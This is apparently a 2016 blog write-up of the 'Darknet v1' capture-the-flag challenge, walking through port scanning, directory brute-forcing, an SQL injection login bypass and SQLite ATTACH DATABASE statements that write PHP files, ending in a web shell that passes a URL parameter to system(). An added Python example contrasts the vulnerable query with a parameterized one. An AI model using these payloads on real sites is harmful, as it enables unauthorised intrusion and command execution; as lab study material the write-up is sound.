Thursday, 9 June 2016

Darknet v1 challenge

Hello all,
Today I would like to present my solution to the Darknet challenge.
Scanning phase

OK, we have three open ports: 80, 111 and 43412. We used nmap's aggressive mode, so we can see, for example, the Apache version. As far as I know this version has no critical vulnerabilities. rpcinfo does not show us an NFS service (we know how to exploit NFS). Let's verify our hypothesis.

OK, we should focus on the web application (as practically always :)).

Hmmmm, what do you think about dirb or dirbuster? I think so.

The /access/ directory looks attractive from our point of view.

Nice, we see a backup file and we are able to download it. I have downloaded the file and its content looks as follows

DirBuster has additionally found the /sec.php path, but

Hmmm, we got a 500 response (internal server error), but at least we know that a webmaster user exists.
I have no idea what else we could do :-( The downloaded file has to be some kind of hint. Hmmm, let's try adding the following line to /etc/hosts

and let's try browsing

and voila! Now let's run DirBuster again. Unfortunately we got nothing interesting. I tried brute-forcing the web-based panel using hydra - without success, SQL injection - without success, but when I filled in admin' as the username and any password at all, I got this result

The token looks like an MD5 hashed string. I cracked the string and got dasd. Hmmm, maybe it is a password? Grrr, without success. sqlmap also tried, without success... I was googling "how to bypass authentication sqlite" and I found it!
We know from the VirtualHost configuration that there is a devnull user, so I bypassed the authentication using devnull' OR '1 as the username and a random password.
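To show why the devnull' OR '1 login works and what the fix looks like, here is an added example (not code from the challenge or from this post) that rebuilds the login check twice over a constructed in-memory SQLite table: once with string concatenation, which is the pattern the bypass depends on, and once with bound parameters. The table, user names and passwords are assumptions, since the post never shows the panel's real schema.

```python
import sqlite3

# Constructed sample table standing in for the challenge's login database
# (the post never shows the real schema, so this is an assumption).
USERS = [("devnull", "placeholder-pass-1"), ("webmaster", "placeholder-pass-2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string concatenation: the input becomes part of the SQL.
    With devnull' OR '1 the WHERE clause turns into
    username = 'devnull' OR ('1' AND password = '...'), which is true for devnull."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters; SQLite treats the input as data only."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def attempt(login, username, password):
    """Run a login function and report the outcome: the matched user, None for
    a rejected login, or "error" when the input broke the SQL (the 500 seen above)."""
    try:
        return login(make_db(), username, password)
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    for user in ("admin'", "devnull' OR '1", "devnull"):
        print(f"{user!r:18} vulnerable={attempt(login_vulnerable, user, 'x')!r:10} "
              f"safe={attempt(login_safe, user, 'x')!r}")
```

The admin' input reproduces the internal server error from the unterminated quote, while the parameterized version simply rejects every malformed name.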

Great! We are able to create our SQL backdoor. Let's try
ATTACH DATABASE '/home/devnull/public_html/img/info.php' AS pwn;
CREATE TABLE pwn.t (code TEXT); -- table name "t" is assumed; the original line omitted it
INSERT INTO pwn.t (code) VALUES ("<pre><?php echo phpinfo(); ?></pre>");
and the result

OK, it works! Now we are able to upload our backdoor, but unfortunately the PHP configuration is not friendly for us, because the following functions are disabled
system, eval, shell_exec, passthru, popen, proc_open, escapeshellarg, escapeshellcmd, exec, proc_close, proc_get_status, proc_nice, proc_terminate, pcntl_exec
so my idea is to add an empty php.ini file.
I did that using the administrator SQL and I added the script
ATTACH DATABASE '/home/devnull/public_html/img/shell.php' AS pwn;
CREATE TABLE pwn.t (code TEXT); -- table name "t" is assumed; the original line omitted it
INSERT INTO pwn.t (code) VALUES ("<pre><?php echo system($_GET['cmd']); ?></pre>");


Great! We have got a limited shell!